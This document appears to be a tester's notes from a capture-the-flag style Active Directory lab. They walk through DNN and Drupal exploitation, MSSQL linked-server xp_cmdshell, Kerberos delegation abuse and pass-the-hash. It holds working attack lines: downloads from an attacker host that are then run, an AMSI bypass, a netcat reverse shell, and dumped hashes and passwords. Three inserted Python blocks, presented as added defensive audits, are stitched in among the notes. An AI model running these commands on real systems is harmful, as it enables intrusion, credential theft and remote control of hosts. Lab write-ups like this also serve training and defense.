Initial IP enumeration

Service and Version Information
- IP: 10.10.110.10
- Port: 80/tcp
- State: Open
- Service: HTTP
- Server: Microsoft IIS httpd 10.0
- Operating System: Windows (identified from Service Info)
HTTP Methods:
- Supported Methods: OPTIONS, TRACE, GET, HEAD, POST
Robots.txt Analysis:
- Disallowed Entries: 30
- Significant Paths: /admin/, /App_Browsers/, /App_Code/, /App_Data/, /bin/, /Components/, /Config/, /DesktopModules/, /Install/, /Portals/, /Providers/, etc.
DotNetNuke
The machine 10.10.110.10 is running DNN CMS, which has a cookie deserialization vulnerability (https://hackerone.com/reports/876708, https://www.exploit-db.com/exploits/48336).
Initial Foothold
The simplest and fastest way to get access to this machine is to use the Metasploit module
[`exploit/windows/http/dnn_cookie_deserialization_rce`](https://www.exploit-db.com/exploits/48336)

Get-PSDrive -PSProvider FileSystem | ForEach-Object {
Get-ChildItem -Path $_.Root -Filter flag.txt -Recurse -ErrorAction SilentlyContinue
}
Directory: C:\DotNetNuke
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/19/2020 1:24 PM 62 flag.txt
As we are running as a service account, the most probable way to escalate privileges would be a token impersonation attack. Rather than using an exploit like Potato or PrintSpoofer, I used the getsystem command of the Metasploit framework to get the admin shell.
Once I had the admin shell I wanted to move to the Sliver command and control framework,
so I uploaded the binary generated from Sliver C2 and executed it as the Administrator user.

sliver (ROLLING_CEREAL) > execute ./agent_windows.exe -connect 10.10.15.57:443 --ignore-cert
hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7574cbf9d92c39d1d4dccd7b89301d2f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
The IP address of the machine itself is
The ARP table of the machine shows a connection to another machine.

Pivoting through the network
Setting up ligolo proxy
sudo ip tuntap add user jay mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.9.20.0/24 dev ligolo (Don't forget to change this)
./proxy -selfcert -laddr 10.10.15.57:443
C:\Users\Administrator\Desktop>agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert
agent_windows.exe -connect 10.10.15.57:8443 --ignore-cert
time="2023-12-13T12:17:24-05:00" level=warning msg="warning, certificate validation disabled"
time="2023-12-13T12:17:24-05:00" level=info msg="Connection established" addr="10.10.15.57:8443"
Enumerating Internal Network

Exploiting mssqlbrowser
.11
https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/

[+]SQL Server Browser service is already enabled and running.
[**] Finished Enable DAC Task
Instance LinkedServer Username Password
-------- ------------ -------- --------
SQLEXPRESS m3sqlw.m3c.local sa RDO1uDB05g
PS C:\Users\Public\Desktop>
Logging in with mssqlclient
mssqlclient.py sa:RDO1uDB05g@10.9.20.13
RDO1uDB05g
select srvname from master..sysservers
select * from openquery("m3sqlw.m3c.local", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='m3sqlw.m3c.local'
EXEC master.dbo.sp_serveroption @server = N'SQL03', @optname = N'rpc out', @optvalue = N'true';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
-- Enable show advanced options on the linked server
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [m3sqlw.m3c.local];
-- Enable xp_cmdshell on the linked server
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [m3sqlw.m3c.local];
-- Optionally, you can disable show advanced options again for security
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [m3sqlw.m3c.local];
-- Execute 'whoami' command on the linked server
EXEC('EXEC xp_cmdshell ''whoami'';') AT [m3sqlw.m3c.local];
-- Execute 'ipconfig' command on the linked server
EXEC('EXEC xp_cmdshell ''ipconfig'';') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -Command "(New-Object Net.WebClient).DownloadString(''''http://10.10.15.57:443/large1.ps1'''') | Out-File -Append ''''C:\Users\svc_sql\Documents\large1.ps1''''"'';') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -Command "(New-Object Net.WebClient).DownloadFile(''''http://10.10.15.57:443/HANDICAPPED_LEADERSHIP.exe'''', ''''C:\Users\svc_sql\Documents\HANDICAPPED_LEADERSHIP.exe'''')"''') AT [m3sqlw.m3c.local];
EXEC('EXEC xp_cmdshell ''powershell -noprofile C:\Users\svc_sql\Documents\large1.ps1'';') AT [m3sqlw.m3c.local];
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
powershell -Command "(New-Object Net.WebClient).DownloadString('http://10.10.15.57:443/PowerUp.ps1') | Out-File -Append 'C:\Users\svc_sql\Documents\PowerUp.ps1'"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:443/PetitPotato.exe', 'C:\Users\svc_sql\Documents\PetitPotato.exe')"
./PetitPotato.exe 3 "powershell -ep bypass ; powershell C:\Users\svc_sql\Documents\large1.ps1"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:443/HANDICAPPED_LEADERSHIP.exe', 'C:\Users\Administrator\Documents\HANDICAPPED_LEADERSHIP.exe')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/mimikatz.exe', 'C:\Users\Administrator\Documents\mimikatz.exe')"
mimikatz # lsadump::sam
Domain : M3SQLW
SysKey : 2aa1b3c2027d47c1a8432f8d2e455268
Local SID : S-1-5-21-907414912-929592110-1210139672
SAMKey : 4c64e99784b32888758343dd112f02f4
RID : 000001f4 (500)
User : Administrator
Hash NTLM: f762bda6a668b1ae8de5534acfa306da

.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x6f0f71 /service:krbtgt /nowrap
doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA62t3vY1fi2SOhS61QYWB0QkVkO4FAd7vcX4D6QIRGHA1HeQCHF/yAof99yNP65oUEcLyP/KBfiVhzR4iAOyAtONJJp790oeGOOG91XaNs/rRPnCctxFMtj7VIzfOupyakzXDVo7JR/pE5ApXJTTfWnqGDHNg5VenAXvWWfDWBCmbpQDgiJ3+Wou1UKZ8r0fqLbPgE09dyVBXWZPbRhFmHx802s3lpnkc+TR7YZFxtNU1RVmaRqyqbFeBq3YoBT55eMF/VMcDwrlMJcGUpd4UuoXTd0HEvMuBBQhQAKKTTDycfsrhJkYtpCe6o6BjiN/KzAlvWo/GZcwFPazEfsw4jwrw1J5ec3g9Jdj6uRmceaHFC4pJ2mSI18DxuAHRuC/RkkO5YPoZhOxN+pWHoXCO1jfv4WfNMMrfOKczXM72opOLTqyR/af2mMA5DMy+5XqWGd5Sl1QX+7at2+FdF/bKo1R/m1nYWTRM99xzKtmV0EtSt7/G+QYuz5Exy2iw3zcqID1Wmqu3WEbIdhT/Z1LsLmaGhHLK0m6Fx8iR4WQTAN0OWOE1YfWkPSc9fhrPX1Sil/BUY7Sl/d4DFwWHvIEPTRQsgKExoVfDNN14NkLfTNQ03opC/yw/Hsb4gWTNJgHVickt/7i+yc8aTKAE44HVs+TvGE5Bg5lutr8H+DuvabWy6rX32KIfyKlbm5kXvok6PNWWxTwEe4wsHd5UFRCsfJpGHgBUW/+adG2opEPoV5SeIHjdXyNqR3Zxnq4yuX07dx3vSqpULEAMY2PwC+d5W1xIgN2ZQOKYewmg6lwfXSD1diYkR+aTc5klBovvxr9w+tnJOpmGNc2Y40ZYlhhssij0DLbVEBVYyGWIh4lVk+/3Gr2KtYKZqDO0ntp26tZwgDdRavFFFQTry8m4Ruw9gLLBv3yV/udr8qQA+c+rGSzE9psb/6QS4CS1wML5LQ8vwafTiPi53ZKBfhW+3/4zrS8ZrMa+v5YGVQ0VX0fVc0Z1ndF3bKryyr9Ahm3K3r+4eIxY97b81I1N50NBaEDuY9kj0ih03A5o6ZburwTHnc6VPmhAAW4HmeIWV8Da7fh50/3eIWtq/H+lYU2qomw775Cdb/NymhNxBWrsIAzd/JxkI445RNF5Y1OEDhA0nMO54k7T1zK+rHk0W+yv/mV9jEr87vWwucWH51nwv35c1vdeLWreSpPu7wf+Rm2Hi263gNmAsE1aEmkC+MY90eHG7P5jwiejcFS0G6nhY9TzaOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEICLDcqSK4+/2sWTp4GdtDoYAewoKfgR68rV9Hud/x9CboQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyMzEyMDcwMjAwMDVaphEYDzIwMjMxMjA3MTIwMDA1WqcRGA8yMDIzMTIxNDAyMDAwNVqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw=
Get-domainuser | select cn, logoncount
Getting tgt for svc_sql from above
[IO.File]::WriteAllBytes("C:\Users\svc_sql\Documents\tgt_svc_sql.kirbi", [Convert]::FromBase64String("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"))
bloodhound-python -u 'svc_sql' -dc 'm3dc.m3c.local' -no-pass -d m3c.local -c all -ns 10.9.20.12 --cachefile ticket2.cache -k
./Rubeus.exe s4u /impersonateuser:micheal.crosley /msdsspn:time/m3webaw.m3c.local /user:svc_sql /altservice:http /ticket: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 /nowrap /ptt
(.12 from .11)
Enter-PSSession -ComputerName m3webaw.m3c.local
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:443/HANDICAPPED_LEADERSHIP.exe', 'C:\Users\Micheal.Crosley\Documents\HANDICAPPED_LEADERSHIP.exe')"
./HANDICAPPED_LEADERSHIP.exe
powershell -Command "(New-Object Net.WebClient).DownloadString('http://10.10.15.57:443/PowerUp.ps1') | Out-File -Append 'C:\Users\Micheal.Crosley\Documents\PowerUp.ps1'"
powershell -Command "(New-Object Net.WebClient).DownloadString('http://10.10.15.57:443/Seatbelt.exe') | Out-File -Append 'C:\Users\Micheal.Crosley\Documents\Seatbelt.exe'"
Active MQ exploit 2016

PS C:\ActiveMQ\conf> cat jetty-realm.properties
cat jetty-realm.properties
admin: 3f18DV^t!svBV4ntcrLRTWi2XaMCDK, admin
#Cyb3rN3t1C5{CR3d$_!n_fil3s}
activemq.username=system
activemq.password=manager
guest.password=password
curl -u 'admin:3f18DV^t!svBV4ntcrLRTWi2XaMCDK' -v -X PUT --data "@jsp-reverse.jsp" http://10.9.20.12:8161/fileserver/..\\admin\\jsp-reverse.jsp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Visit the website and enter the information


./PetitPotato.exe 3 HANDICAPPED_LEADERSHIP.exe

RID : 000001f4 (500)
User : Administrator
Hash NTLM: a549c946ddefbc3d6cb701f66a45fdd4
WriteAccountRestrictions

The user SVC_APACHE@M3C.LOCAL has write rights on all properties in the User Account Restrictions property set. Having write access to this property set translates to the ability to modify several attributes on computer M3DC.M3C.LOCAL, among which the msDS-AllowedToActOnBehalfOfOtherIdentity attribute is the most interesting.
The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation to compromise the remote computer system. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object.
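Because the attribute is a binary security descriptor, the defender's question is simply "which SIDs does its DACL allow?". The following Python is an added example (not part of the original notes) that parses the SDDL text form of such a descriptor, the same "O:BAD:(A;;...;;;SID)" shape the notes build later with RawSecurityDescriptor, and reports any trustee that is not on an approved list. The domain SID, RIDs and the approved list are constructed sample values; converting the raw attribute bytes to SDDL is assumed to have been done by the directory tooling.

```python
"""Added example, not from the original notes: review the SDDL form of a
computer's msDS-AllowedToActOnBehalfOfOtherIdentity and list which
principals it lets act on behalf of other users.

Assumes the descriptor is already in SDDL text ("O:<owner>D:(ace)(ace)..."),
as the notes' own RawSecurityDescriptor line builds it; the SIDs and the
approved list below are constructed sample values.
"""
import re

ACE_RE = re.compile(r"\(([^)]*)\)")


def split_rights(rights):
    """Split an SDDL rights string into its two-letter codes (or keep hex)."""
    if rights.startswith("0x"):
        return [rights]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]


def parse_sddl(sddl):
    """Return (owner, aces); each ACE is a dict with the six standard
    fields: type, flags, rights, object_guid, inherit_guid, sid."""
    owner_m = re.search(r"O:(.+?)(?=[GDS]:|$)", sddl)
    owner = owner_m.group(1) if owner_m else None
    dacl_m = re.search(r"D:(.*?)(?=S:|$)", sddl)
    aces = []
    if dacl_m:
        for body in ACE_RE.findall(dacl_m.group(1)):
            fields = body.split(";")
            if len(fields) < 6:
                raise ValueError(f"malformed ACE: ({body})")
            aces.append({
                "type": fields[0],  # "A" = access allowed, "D" = denied
                "flags": fields[1],
                "rights": split_rights(fields[2]),
                "object_guid": fields[3],
                "inherit_guid": fields[4],
                "sid": fields[5],
            })
    return owner, aces


def allowed_trustees(sddl):
    """SIDs holding an access-allowed ACE; on this attribute every such SID
    may obtain service tickets to the computer as other users (RBCD)."""
    _owner, aces = parse_sddl(sddl)
    return [ace["sid"] for ace in aces if ace["type"] == "A"]


def unexpected_trustees(sddl, approved):
    """Trustees granted by the descriptor that are not on the approved list."""
    return sorted(set(allowed_trustees(sddl)) - set(approved))


# Constructed sample: one approved front-end service account (RID 1104) and
# one trustee nobody signed off on (RID 1105).
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
APPROVED = [f"{DOMAIN_SID}-1104"]
SAMPLE_SDDL = (
    f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{DOMAIN_SID}-1104)"
    f"(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{DOMAIN_SID}-1105)"
)

if __name__ == "__main__":
    owner, aces = parse_sddl(SAMPLE_SDDL)
    print(f"owner: {owner}, {len(aces)} ACE(s)")
    for sid in unexpected_trustees(SAMPLE_SDDL, APPROVED):
        print(f"UNEXPECTED delegation trustee: {sid}")
```

Run periodically against every computer object whose attribute is non-empty, any SID that appears without a change record is exactly the condition the BloodHound text above describes, and clearing the attribute (or removing the ACE) closes it.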
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x787316 /service:krbtgt /nowrap
[IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\svc_apache.kirbi", [Convert]::FromBase64String("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"))
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=svc_apache.ccache
rbcd.py -delegate-from svc_sql -delegate-to M3DC$ -action 'write' 'm3c.local/svc_apache' -k -no-pass

export KRB5CCNAME=ticket2.ccache (tgt of svc_sql)
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_sql' -k -no-pass

export KRB5CCNAME=Norma.branham.ccache
└─$ cme smb 10.9.20.10 -u norma.branham --use-kcache --sam
SMB 10.9.20.10 445 M3DC [*] Windows 10.0 Build 14393 x64 (name:M3DC) (domain:m3c.local) (signing:True) (SMBv1:False)
SMB 10.9.20.10 445 M3DC [+] m3c.local\norma.branham from ccache (Pwn3d!)
SMB 10.9.20.10 445 M3DC [*] Dumping SAM hashes
SMB 10.9.20.10 445 M3DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:7574cbf9d92c39d1d4dccd7b89301d2f:::
SMB 10.9.20.10 445 M3DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.20.10 445 M3DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.20.10 445 M3DC [+] Added 3 SAM hashes to the database
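Note that the RID 500 NT hash dumped here from M3DC is the same value that the first hashdump returned on the initial foothold host, so one local Administrator password is shared across hosts, which is what makes pass-the-hash lateral movement work. The Python below is an added example (not from the original notes) that finds such reuse in hashdump/--sam style output: it parses pwdump-formatted lines, with or without the "SMB ip port host" prefix, and reports every non-empty RID 500 hash seen on more than one host. All host names and hashes in the sample are constructed.

```python
"""Added example, not from the original notes: detect local Administrator
NT-hash reuse across hosts in hashdump / --sam style output.

Assumes pwdump-formatted lines, user:rid:lmhash:nthash:::, optionally
prefixed by a tool banner such as "SMB <ip> 445 <host> ". Every hash and
host name below is a constructed sample value.
"""
from collections import defaultdict

# Hash of the empty LM password and of the empty NT password; disabled
# built-in accounts (Guest, DefaultAccount) normally carry the latter.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_hashdump(text):
    """Yield (user, rid, nthash) for every pwdump-formatted line in text."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # status lines such as "[*] Dumping SAM hashes"
        # The user name is the last whitespace-separated token before the
        # first colon, which drops any "SMB <ip> <port> <host>" prefix.
        user = parts[0].split()[-1] if parts[0].split() else ""
        rid, nt = parts[1].strip(), parts[3].strip().lower()
        if not user or not rid.isdigit() or len(nt) != 32:
            continue  # not a credential line (timestamps also contain colons)
        yield user, int(rid), nt


def find_shared_admin_hashes(dumps):
    """dumps maps host name -> hashdump text.

    Returns {nthash: [hosts]} for each NT hash that the built-in
    Administrator (RID 500) shares on two or more hosts. The empty-password
    hash is ignored so disabled accounts do not produce false positives.
    """
    hosts_by_hash = defaultdict(list)
    for host, text in dumps.items():
        for _user, rid, nt in parse_hashdump(text):
            if rid == 500 and nt != EMPTY_NT:
                hosts_by_hash[nt].append(host)
    return {nt: sorted(h) for nt, h in hosts_by_hash.items() if len(h) > 1}


# Constructed sample: web01 and dc01 share one local Administrator hash,
# sql01 has a different one.
SAMPLE_DUMPS = {
    "web01": (
        f"Administrator:500:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::\n"
        f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::\n"
    ),
    "dc01": (
        "SMB 10.0.0.10 445 DC01 [*] Dumping SAM hashes\n"
        f"SMB 10.0.0.10 445 DC01 Administrator:500:{EMPTY_LM}:0123456789abcdef0123456789abcdef:::\n"
        f"SMB 10.0.0.10 445 DC01 DefaultAccount:503:{EMPTY_LM}:{EMPTY_NT}:::\n"
    ),
    "sql01": f"Administrator:500:{EMPTY_LM}:fedcba9876543210fedcba9876543210:::\n",
}


def report(dumps=SAMPLE_DUMPS):
    """Print and return the reuse findings for a set of dumps."""
    findings = find_shared_admin_hashes(dumps)
    if not findings:
        print("no local Administrator hash reuse found")
    for nt, hosts in findings.items():
        print(f"RID 500 NT hash {nt[:8]}... is shared by: {', '.join(hosts)}")
    return findings


if __name__ == "__main__":
    report()
```

The usual fix for a positive finding is per-host local administrator passwords managed by LAPS (the SYSVOL listing later in these notes shows a LAPS installer was at least staged in this lab).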

psexec.py m3dc.local/Administrator@m3dc.m3c.local -hashes aad3b435b51404eeaad3b435b51404ee:5a0618a9e03bd9fa9efbe142468afed5
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
xfreerdp /u:Administrator /pth:5a0618a9e03bd9fa9efbe142468afed5 /v:10.9.20.10
Cyb3rN3t1C5{C0n$tr@!n3d!}

Method 2
$psh = [PowerShell]::Create().AddCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Import-Module ./powerview.ps1
$ComputerSid = Get-DomainUser svc_apache -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer M3DC.m3c.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/mist.ps1')
From sliver
rubeus tgtdeleg /service:krbtgt /nowrap
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
./Rubeus.exe s4u /user:svc_apache /impersonateuser:norma.branham /msdsspn:cifs/M3DC.m3c.local /ticket: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 /ptt
dir \\m3dc.m3c.local
Cyb3rN3t1C5{C0n$tr@!n3d!}
secretsdump.py -hashes 5a0618a9e03bd9fa9efbe142468afed5:5a0618a9e03bd9fa9efbe142468afed5 m3c.local/Administrator@10.9.20.10
┌──(jay㉿localhost)-[~/prolabs/cybernatics]
└─$ cat m3dc_loot.txt| cut -d ":" -f1 > m3dc.users
┌──(jay㉿localhost)-[~/prolabs/cybernatics]
└─$ cat m3dc_loot.txt| cut -d ":" -f4 > m3dc.password
New Domain from m3dc.m3c.local
sudo ip route add 10.9.15.0/24 dev ligolo
Use Method 1 from above to log in.


To Everyone:
In an effort to increase our security posture, we have moved forward with user certificate authentication. If you haven't had the opportunity to come into the office or are using your own devices, you can request a certificate via the certenroll API (see below). For more information on this process check out https://blogs.technet.microsoft.com/askds/2010/05/25/enabling-cep-and-ces-for-enrolling-non-domain-joined-computers-for-certificates/. If you're still having issues email Ilene_Rasch@cyber.local over at Help Desk.
Furthermore, we have started to roll out our network segmentation plan to only allow business related traffic. We also deployed Zabbix with an API to increase our systems/network visibility. The process is simple, the zabapi user logs in, collects information and sends it back to the console.
Requesting a user certificate can only be done from a Windows machine.
1. Request a certificate from https://certenroll.cyber.local/ADPolicyProvider_CEP_UsernamePassword/service.svc/CEP (Public IP: 10.10.110.11. Requires RootCA from the parent SYSVOL directory)
2. Once you have a certificate you can authenticate to Email and Jenkins
User Email: https://mail.cyber.local/owa (Public IP: 10.10.110.12)
Jenkins: https://jenkins.cyber.local (Public IP: 10.10.110.12. Only DevOPS can authenticate to this portal)
Have a wonderful day!


10.9.15.11 COREWEBDL

sudo msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS 10.9.15.11; set LHOST tun0; set LPORT 80; exploit"
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.207 8080 >/tmp/f

www-data@corewebdl:/var/www/html$ cat flag.txt
cat flag.txt
Cyb3rN3t1C5{W3lC0m3_2_Cyb3rn3t!cs}
LinEnum

/etc/krb5.conf
[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r-- 1 www-data root 0 Feb 20 2018 /var/www/html/drupal/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 www-data root 0 Feb 20 2018 /var/www/html/drupal/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak




Linpeas

Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 COREWEBDL$@CORE.CYBER.LOCAL
2 host/COREWEBDL@CORE.CYBER.LOCAL
2 host/corewebdl@CORE.CYBER.LOCAL
2 host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL
2 host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL
2 host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
(each of the seven principals appears five times in the full listing; the repeats are omitted here)
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "COREWEBDL$@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
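What linpeas is really reporting here is that the web server's keytab (the machine account's long-term keys) is readable to the www-data user, so whoever owns the web shell owns the computer account in the domain. As an added example (not part of the original notes), the Python below turns a `klist -k` listing into an inventory and a short list of findings: whether the keytab file mode lets other local users read it, whether it holds machine-account keys, and whether stale key versions are still present. The listing and the file mode it is run with are constructed samples, not the lab's output.

```python
"""Added example, not from the original notes: inventory a keytab from
`klist -k` output and flag the exposure a readable keytab represents.

Assumes the default klist listing format (a KVNO column followed by the
principal). The listing and file mode below are constructed samples.
"""
import re
import stat
from collections import defaultdict

ENTRY_RE = re.compile(r"^\s*(\d+)\s+(\S+@\S+)\s*$")


def parse_klist(text):
    """Return a list of (kvno, principal) tuples, one per keytab entry."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((int(m.group(1)), m.group(2)))
    return entries


def group_by_principal(entries):
    """Map principal -> sorted list of distinct KVNOs present for it."""
    kvnos = defaultdict(set)
    for kvno, principal in entries:
        kvnos[principal].add(kvno)
    return {p: sorted(k) for p, k in kvnos.items()}


def audit_keytab(text, mode):
    """Return a list of findings for a keytab listing and its file mode
    (the st_mode value, e.g. 0o644)."""
    findings = []
    by_principal = group_by_principal(parse_klist(text))
    if mode & stat.S_IROTH:
        findings.append("keytab is world-readable: any local user can "
                        "authenticate as every principal in it")
    machine = [p for p in by_principal if p.split("@")[0].endswith("$")]
    if machine:
        findings.append("contains machine account key(s): " + ", ".join(sorted(machine)))
    for principal, kvnos in sorted(by_principal.items()):
        if len(kvnos) > 1:
            findings.append(f"{principal} keeps old key versions {kvnos}; rotate and prune")
    return findings


# Constructed sample listing in the klist -k format.
SAMPLE_KLIST = """\
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 WEBHOST$@CORP.EXAMPLE
   2 WEBHOST$@CORP.EXAMPLE
   2 host/webhost@CORP.EXAMPLE
   2 host/webhost.corp.example@CORP.EXAMPLE
   3 host/webhost.corp.example@CORP.EXAMPLE
"""

if __name__ == "__main__":
    # In practice: mode = os.stat("/etc/krb5.keytab").st_mode
    for finding in audit_keytab(SAMPLE_KLIST, 0o644):
        print("-", finding)
```

The mitigation is the obvious one: a keytab should be mode 0600 and owned by the account that needs it, and a service running as www-data should not need the host keytab at all.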
tickets kerberos Not Found
cat /etc/krb5.conf

Using PBIS tools
www-data@corewebdl:/opt/pbis/bin$ ./get-status
./get-status
LSA Server Status:
Compiled daemon version: 8.8.0.506
Packaged product version: 8.8.506.0
Uptime: 0 days 4 hours 56 minutes 27 seconds
[Authentication provider: lsa-activedirectory-provider]
Status: Online
Mode: Un-provisioned
Domain: CORE.CYBER.LOCAL
Domain SID: S-1-5-21-1559563558-3652093953-1250159885
Forest: cyber.local
Site: core
Online check interval: 300 seconds
[Trusted Domains: 5]
[Domain: core]
DNS Domain: core.cyber.local
Netbios name: core
Forest name: cyber.local
Trustee DNS name:
Client site name: core
Domain SID: S-1-5-21-1559563558-3652093953-1250159885
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0019]
[0x0001 - In forest]
[0x0008 - Primary]
[0x0010 - Native]
Trust type: Up Level
Trust Attributes: [0x0000]
Trust Direction: Primary Domain
Trust Mode: In my forest Trust (MFT)
Domain flags: [0x0001]
[0x0001 - Primary]
[Domain Controller (DC) Information]
DC Name: coredc.core.cyber.local
DC Address: 10.9.15.10
DC Site: core
DC Flags: [0x0003f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Global Catalog (GC) Information]
GC Name: coredc.core.cyber.local
GC Address: 10.9.15.10
GC Site: core
GC Flags: [0x0003f3fd]
GC Is PDC: yes
GC is time server: yes
GC has writeable DS: yes
GC is running KDC: yes
[Domain: CYBER]
DNS Domain: cyber.local
Netbios name: CYBER
Forest name: cyber.local
Trustee DNS name: CORE.CYBER.LOCAL
Client site name: Core
Domain SID: S-1-5-21-2011815209-557191040-1566801441
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0027]
[0x0001 - In forest]
[0x0002 - Outbound]
[0x0004 - Tree root]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0020]
[0x0020 - Within forest]
Trust Direction: Twoway Trust
Trust Mode: In my forest Trust (MFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: cydc.cyber.local
DC Address: 10.9.10.10
DC Site: Root
DC Flags: [0x0003f37d]
DC Is PDC: yes
